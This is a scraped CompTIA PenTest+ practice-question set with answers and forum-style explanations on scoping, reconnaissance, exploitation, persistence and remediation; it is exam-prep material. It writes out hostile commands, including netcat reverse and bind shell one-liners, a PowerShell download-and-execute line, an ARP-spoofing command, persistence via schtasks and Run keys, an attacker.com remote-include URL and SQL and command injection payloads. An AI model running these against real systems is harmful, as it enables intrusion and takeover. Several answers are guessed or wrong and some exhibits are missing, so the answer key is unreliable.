CompTIA Pentest+ Practice
A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would define the target list?
Statement of work Explanation: A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.
In which of the following scenarios would a tester perform a Kerberoasting attack?
The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement. Explanation: "Kerberoasting is an efficient technique for hackers who have limited rights within a domain. Depending on the strength of the passwords, an attacker can quickly gain access to multiple accounts and then use them to launch additional attacks and collect data." Site: https://www.scip.ch/en/?labs.20181011
A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?
The organization is not taking action to remediate identified findings.
Black box penetration testing strategy provides the tester with:
a target list Explanation: Black box tests, sometimes called zero knowledge tests, are intended to replicate what an attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through a target (infrastructure or systems) as an attacker would.
In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
Brute force the user's password. Explanation: If you have already physical access to the laptop, you don't need to conduct LLMNR/NETBIOS-ns poisoning by MITM to the device. I would go with A. https://bit.ly/2YmpsFg https://www.aptive.co.uk/blog/llmnr-nbt-ns-spoofing/ https://attack.mitre.org/techniques/T1171/
An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
dig -q any _kerberos._tcp.internal.comptia.net Explanation: I would go for A. https://patternbuffer.wordpress.com/2007/12/13/finding-your-active-directory-site-and-domain-controllers/ dig any _kerberos._tcp.yourdomain.yourforest.com This will give you a list of domain controllers to choose from.
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is theBEST control to remediate the use of common dictionary terms?
Configure password filters Explanation: "A custom password filter might also perform a dictionary check to verify that the proposed password does not contain common dictionary words or fragments." https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements
Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?
Lock bypass Explanation: Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an "under-the-door" tool, which goes underneath a door and pulls open a door handle from the inside.
Which of the following has a direct and significant impact on the budget of the security assessment?
Scoping Explanation: The scope of the project always has a major impact on the budget. The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
Scrape the page for hidden fields. Explanation: Note the use of BeautifulSoup python package. "To effectively harvest that data, you'll need to become skilled at web scraping. The Python libraries requests and Beautiful Soup are powerful tools for the job." https://realpython.com/beautiful-soup-web-scraper-python/
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
See photo for answer. Explanation: I would go for B just because I can't find any syntax with a dash in "−&amount=" and I believe you wouldn't want to show the sender ID from "senderID=654846¬ify=False", but the URLs from this question are very bad structured.
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be the MOST effective in accomplishing this?
Badge cloning Explanation: With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.
Consider the following PowerShell command:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-CmdletWhich of the following BEST describes the actions performed by this command?
Execute a remote script. Explanation: In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm Explanation: According to ssh man pages: -L [bind_address:]port:host:hostport : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side. -X : Enables X11 forwarding. https://www.howtogeek.com/168145/how-to-use-ssh-tunneling/ https://explainshell.com/explain?cmd=ssh+-L4444%3A127.0.0.1%3A6000+-X+user%4010.0.0.20+xterm Commands from A seem incomplete: https://www.lifewire.com/linux-command-xhost-4093456
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
ICS vendors are slow to implement adequate security controls. Explanation: "On average, vendors take a rather long time to fix vulnerabilities (more than six months) Elimination of some vulnerabilities—measured by time from vendor notification to release of a patch—can take more than two years. For end users, such protracted responses increase the risk of exploitation of device vulnerabilities." https://www.ptsecurity.com/ww-en/analytics/ics-vulnerabilities-2019/
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched. Explanation: Since the patch is expected within days, I would go with: C. This is safer, and more easily implemented. I think the company can go a few days with only the finance dept. having access.
A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
Insecure file permissions Explanation: - accesschk is a command line tool designed to show what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. In this scenario, I believe the pentester is using accesschk to search C:\Windows folder recursively showing all folders the account has write (rw) access to. https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk -w Show only objects that have write access -s Recurse -q Omit Banner -u Suppress errors
Given the following script: Which of the following BEST describes the purpose of this script?
Keystroke monitoring Explanation: https://github.com/satwikkansal/python-keylogger/blob/master/keylog.pyw https://www.programcreek.com/python/example/97419/pyHook.HookManager
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
Manufacturers developing IoT devices are less concerned with security. Explanation: The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8Which of the following formats is the correct hash type?
NTLM Explanation:According to this website: https://www.tunnelsup.com/hash-analyzer/ It is MD5 or MD4. I think all these answers are incorrect. However, I do believe the correct answer is: NTLM. C. Using this website: https://asecuritysite.com/encryption/lmhash?sortby=hashme gives us 33 characters of an NTML hash. I would go for NTLM based on proximity to number of characters and format. Few Examples: Kerberos: $krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b7...... NetNTLMv1: u4-netntlm::kNS:338d08f8e26de933000000000000000000000000 NTLM: b4b9b02e6f09a9bd760f388b67351e2b SHA-1: b89eaac7e61417341b710b727768294d0e6a277b
After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attacker's actual fingerprint without exploitation.Which of the following is the MOST likely explanation of what happened?
The biometric device is tuned more toward false positives. Explanation: A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a one-to-many search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as false acceptance rates (FARs) and false rejection rates (FRRs).
A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.Which of the following is the BEST explanation for what happened?
The service is running on a non-standard port. Explanation: D. The service is running on a non-standard port ? Can you remove Telnet and run SSH on port 23. The question could even be asking for the explanation to port 23 being open to SSH rather than anything to do with Telnet? If this comes up I'll be going with D I think, seems the safest bet
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
To remove the persistence Explanation: chkconfig is a tool for managing which run levels a service will run at. chkconfig can be used to view or change the run level of a service. Using chkconfig --del <servicename> will set the named service to not run at the current run level and will remove the persistence.
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results above?
Web server configurations may reveal sensitive information. Explanation: Port 21 is for TCP and FTP and is used as a control port. Port 80 is for TCP and HTTP and is used for transferring web pages. Port 443 is used for TCP, HTTPS, and is HTTP over TLS/SSL and is for encrypted transmission. In this scenario, all the ports that the penetration tester has discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan.
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
Rules of engagement Explanation: The rules of engagement include the following: - The timeline when testing will be conducted - What locations, systems, applications, and other potential targets are to be included/excluded - The data handling requirements for information gathered - What behaviors to expect from the target - What resources are committed to the test - Any legal concerns that should be addressed - The when/how communication will occur - Who to contact in case of events - Who is permitted to engage in the penetration testing team
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepassUsing "strings" to print ASCII printable characters from changepass, the tester notes the following:$ strings changepassexitsetuidstrcmpGLIBC_2.0 -ENV_PATH -%s/changepwmallocstrlenGiven this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'. Explanation: https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be theBEST step for penetration?
Search the internet for information on staff such as social networking sites. Explanation: OSINT is the method of searching public records, social media, google etc.
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
Selection of the appropriate set of security testing tools Explanation: A single TCP or UDP port scan against a SCADA component can cause catastrophic damage of mass proportion. Before testing SCADA systems, pentesters should know the proper tools to use to ensure the testing provides adequate coverage and reduces the likelihood of knocking over critical services. Nutting, Raymond. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) (p. 83). McGraw-Hill Education. Kindle Edition.
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
Setting a schedule of testing access times Explanation: The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client's systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization's reaction to attacks.
Which of the following would be the BEST for performing passive reconnaissance on a target's external domain?
Shodan Explanation: Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:IP: 192.168.1.20 -NETMASK: 255.255.255.0 -DEFAULT GATEWAY: 192.168.1.254 -DHCP: 192.168.1.253 -DNS: 192.168.10.10, 192.168.20.10Which of the following commands should the malicious user execute to perform the MITM attack?
arpspoof -t 192.168.1.20 192.168.1.254 Explanation: A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a manin- the-middle attack; it is done by performing arpspoof -t <victimIP> <gatewayIP>. The -t switch specifies a particular host to ARP poison.
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
for x in {1...254}; do dig -x 192.168.$x.$x; done Explanation: http://www.telecom.otago.ac.nz/tele301/student_html/reverse-zones.html Tried A from Kali Linux, and got "WARNING: No targets were specified, so 0 hosts scanned." - Tried B from Windows and D from Linux with no luck. - Tried C from Linux and got "dig: '254}...{1.254}...{1.168.192.in-addr.arpa.' is not a legal name (empty label)", but I guess I need to configure DNS server on this VM but at least it returned something. Tested "nmap -p 53 8.8.8.8" only and got the following: Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 10:45 AUS Eastern Standard Time Nmap scan report for dns.google (8.8.8.8) Host is up (0.0045s latency). PORT STATE SERVICE 53/tcp open domain Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds Tested "nmap -p 53 -oG dnslist.txt local_fileserver_ipaddress | cut -d ":" -f 4" and it resolved the IP to the hostname and output the result in a dnslist.txt file. I know there is no IP range specified but I think this is the "MOST efficient to utilize" as per the question.
Which of the following commands starts the Metasploit database?
msfconsole Explanation: Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploitframework/ msfconsole directory.
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
nc -l -p 4444 /bin/bash Explanation: I believe that the question is asking to create a netcat listener on the compromised device. Therefore, it is asking to create a backdoor from the compromised device. To do that such, the pentester must create a listener on their remote (attacking) system using the following command nc -l -p 4444 or nc -lp 4444. Then, to create the backdoor from the compromised device, the pentester inputs the following command Linux: nc -l -p 4444 -e /bin/bash Windows: nc -l -p 4444 -e cmd.exe. So, I would go with A, providing that it has the -e switch during the actual exam. I think something is missing from these answers. Both A and D would do the same thing, but both would require the -e. At least the answers from Sybex book are: A. nc -lp 4444 -e /bin/bash (Correct - with the same explanation mentioned above) B. nc -lvp 4444 /bin/bash C. nc -p 4444 /bin/bash D. nc -vp 4444 /bin/bash Digging through - https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/ To listen for inbound connections -> nc -l -p port Create a Backdoor -> nc -l -p 6996 -e /bin/bash This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. Tried nc -l -p 4444, nc -lp 4444 and nc -lvp 4444 and they all worked but, if all answers from the question has /bin/bash then you need to have the "-e" switch in order to run the program after a successful connection.
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
responder Explanation: Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services pretending to be the system that the query is intended for.
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?
-p- https://nmap.org/book/man-port-specification.html Explanation: Correct Answer is A nmap -p- [ip_address] This command will initiate a scan against the target host looking for all ports (1-65535). a. -p- https://nmap.org/book/man-port-specification.html
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (SelectTWO).
1. Convert to JAR. 2. Decompile. Explanation: https://stackoverflow.com/questions/12732882/reverse-engineering-from-an-apk-file-to-a-project https://reverseengineering.stackexchange.com/questions/2703/how-do-i-analyze-a-apk-file-and-understand-its-working https://resources.infosecinstitute.com/hacking-java-applications-using-javasnoop/#gref
HOTSPOT -Instructions:Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.You are a security analyst tasked with hardening a web server.You have been given a list of HTTP payloads that were flagged as malicious.Hot Area:
1. DOM - Input Sanitization (last) 2. Sql Injection Stacked - Parameterized Queries 3. Reflected - Input sanitization(last) 4. LFI - sandbox req 5. CI - sandbox req 6. union - para query 7. SQL error - param que 8. RFI - sandbox 9. CI - input saniti $ 10. URL redirect - prevent external calls Explanation: .For SQL injection the BEST remediation will always be parameterized Queries . For command injection it will be input sanitization and for XSS it will always be input sanitization with <,> due to the nature of XSS commands that involve <>. SO redir=http:%2f%2fwww.malicious-site.com this is a URL redirect and the remediation is preventing external calls 100% Sure on this lookup=$(whoami) this is command injection and the remediation is input sanitization ",$,(.),(.). The one with the $. 100% sure on this one too item=widget'+ convert(int, @@version)+' This is SQL injection error based the error comes from the converting of the integer in the brackets which forces an error.As you know INT is a type for data in SQL . As i said for SQL the BEST solution is parameterized queries. 100% sure on this. You can type the command in google and it will show up as an example , took a lot of google searching but it's there. item=widget%20union ........ The union is a dead giveaway so, SQL injection (union) Remediation is Parametirized Qeuries.
Which of the following are MOST important when planning for an engagement? (Select TWO).
1. Goals/objectives 2. Tolerance to impact Explanation: Company policy may be important in the *decision* as to whether, or not, you want to have a pentest. But it is not usually part of the planning process. Goals and objectives are always part of the planning process.
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
1. Health information communicated over HTTP 2. DAR encryption on records servers Explanation: https://www.zettaset.com/blog/hipaa-data-at-rest-encryption-requirements/ https://healthitsecurity.com/features/the-difference-between-healthcare-data-encryption-de-identification
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (SelectTHREE).
1. Mandate all employees take security awareness training. 2. Implement two-factor authentication for remote access. 3. Increase password complexity requirements. Explanation: I don't think that upgrading the cipher suite would change anything because the attacker was successful using social engineering (Phishing). The level of security really doesn't mean much if the attacker is able to con their way through with a little bit of charm. As a result, I would go with ABD like Boblee. People, Process, Technology. A - People B - Technology D - Process
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)
1. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. 2. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
1. Require multifactor authentication for all logins. 2. Increase minimum password complexity requirements. 3. Apply additional network access control. Explanation: In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: - Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. - Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack.
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)
1. SSH 2. Netcat Explanation: I think I will go with D. SSH and E. Netcat. I may be overthinking this but, SSH has many features including local port forwarding. Therefore, I would use ssh to forward the traffic back to a device (my attacking machine). Now using netcat (nc -nlvp 1234) I would start my listener on my attacking machine to intercept and monitor all connections being made. Correct me if I'm wrong, but the question is stating that the pentester wishes to forward traffic and now capture traffic. Tcpdump(command-line) and Wireshark(GUI) does the same thing, nmap would say what ports are opened (the pentester already knows that info), Cain and Abel is a password recovery tool. SSH Features: https://www.techrepublic.com/article/how-to-use-local-and-remote-ssh-port-forwarding/. I would go with DE. The following script allows to use both Netcat with SSH for port forwarding: $ mkfifo pipe $ while [ 1 ]; do nc -l -p 8080 < pipe | ssh gw_to_private_net \ -p 22977 "nc 192.168.12.230 80" | tee pipe; done https://jtway.co/netcat-with-ssh-port-forwarding-148177b2e850
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
1. Search social media for information technology employees who post information about the technologies they work with. 2. Use domain and IP registry websites to identify the company's external netblocks and external facing applications. Explanation: PASSIVE. Agree! C and D. Info taken from the PenTest+ Practice Tests Book - SYBEX: "Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can't use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, as is penetrating the organization's facility or wheedling information out of a disgruntled employee. On the other hand, gathering information from the organization's DNS registrar or reading job postings on the organization's website are examples of passively gathering public information."
Click the exhibit button. Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
1. Session hijacking 2. Arbitrary code execution Explanation: Cross-Site Tracing (XST) https://owasp.org/www-community/attacks/Cross_Site_Tracing https://capec.mitre.org/data/definitions/107.html Arbitrary code execution https://www.kb.cert.org/vuls/id/520827/ According to wikipedia, XST can be used to get cookies. Cookies can be used for session hijacking. "XST scripts exploit ActiveX, Flash, or any other controls that allow executing an HTTP TRACE request. The HTTP TRACE response includes all the HTTP headers including authentication data and HTTP cookie contents, which are then available to the script. In combination with cross domain access flaws in web browsers, the exploit is able to collect the cached credentials of any web site, including those utilizing SSL. " https://en.wikipedia.org/wiki/Cross-site_tracing
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
1. Shodan 2. Maltego Explanation: "There are a variety of tools that assist with this OSINT collection: Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. nslookup tools help identify the IP addresses associated with an organization. Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership."
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
1. The system shows evidence of prior unauthorized compromise. 2. The system becomes unavailable following an attempted exploit. Explanation: "These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access."
A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?
APT actors Explanation: An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren't monitored for or detected by the client's systems, the findings should include information that can help them design around this potential problem.
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
1. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f 2. nc -e /bin/sh 192.168.1.5 44444 Explanation: According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444 - A is probably wrong because no shell is executed - B is probably wrong because no IP is not specified - E is wrong because there is no 444444 port (too high a port) - F is wrong because the IP is 192.168.5.1 not 192.168.1.5. The question asks two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener from from the remote machine used for a bind shell. Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell. nc -nvlp 5555 -e /bin/bash - setting up a listener from the remote machine nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell. nc -nvlp 5555 - setting up a listener from the attacker machine nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
An applicable XSD file Explanation: SOAP IS an XML based communications protocol but other communication standards may also use XML. For example REST can use XML, and there also XML-RPC. The question does not specify the communication standard being used. Therefore, IMO: D. An applicable XSD file Seems to be the most likely answer.
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich of the following remediation steps should be taken to prevent this type of attack?
Block URL redirections. Explanation: In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened. URL redirection, also called URL forwarding, is a World Wide Web technique for making a web page available under more than one URL address. When a web browser attempts to open a URL that has been redirected, a page with a different URL is opened. Similarly, domain redirection or domain forwarding is when all pages in a URL domain are redirected to a different domain, as when wikipedia.com and wikipedia.net are automatically redirected to wikipedia.org.
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
Clickjacking attack Explanation: Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the toplevel page. The tester is "hijacking" clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking a button that appears to perform another function.
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
Common libraries Explanation: https://forums.docker.com/t/question-on-shared-libraries/45515 https://stackoverflow.com/questions/35863608/shared-library-in-containers https://www.netapp.com/us/info/what-are-containers.aspx A common library like a DLL can affect multiple programs at one time. The question is "what component", not "what attack/exploit art", so it should be A.
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy: Which of the following types of vulnerabilities is being exploited?
Cookie enumeration Explanation: I believe the pentester is trying to use cookie enumeration in order to guess a session ID from an user who has got access to files from that specific area of the site - RTSdocuments. "PHPSESSID - The PHPSESSID cookie is native to PHP and enables websites to store serialised state data. It is used to establish a user session and to pass state data via a temporary cookie, which is commonly referred to as a session cookie. (expires when you close your browser)." https://www.catchments.ie/cookie-policy/ https://www.netsparker.com/blog/web-security/cross-site-cookie-manipulation/ I don't think it's A because there are no variables from user details in the link in order to get access to RTSdocuments.
A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
Create a frame that overlays the application. Explanation: Sounds like B could be the best answer: https://www.w3.org/Security/wiki/Clickjacking_Threats - "The most common form of clickjacking attack involves obscuring a trusted dialogue by overlaying malicious content." https://blog.qualys.com/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole - "Clickjacking is an attack that tricks a web user into clicking a button, a link or a picture, etc. that the web user didn't intend to click, typically by overlaying the web page with an iframe. This malicious technique can potentially expose confidential information or, less commonly, take control of the user's computer. For example, on Facebook, a clickjack can lead to an unauthorized user spamming your entire network of friends from your account." the best answer to this question would be "clickjacking" but that is not offered. Answers B, C, and D, could all be part of a clickjacking attack.
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
Decompile the application. Explanation: Decompile the application Jave bytecode is going to be difficult for a human to read. C. Agree with D1960 - https://blog.jetbrains.com/idea/2020/03/java-bytecode-decompiler/. Definitely C. PenTest+ Practice Tests Book - SYBEX "One option you could try in this scenario is to decompile the application's executable. This process will reveal the application's assembly-level code that you can analyze for weaknesses."
A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
Disable unneeded services. Explanation: In this scenario, since there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client only uses post 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
Discovery scan Explanation: It will depend on the type of pentest if it was a white box, it will most definitely be D, Nevertheless this type of tricky question does not specify and as a pentester you might not get credentials making A the right anwser. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?
Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure. Explanation: the question says which of the following is the 'Most effective way of notifying management of these findings and its importance' i think the answer is A then after that if need be to Request management to create RFP we can do that after doing A.
A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
Download the GHOST file to a Linux system and compile gcc -o GHOST.c test i: ./GHOST Explanation: I would go for C as the vulnerability seems to only affect Linux servers. GCC is available for Windows but not the vulnerability
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials.
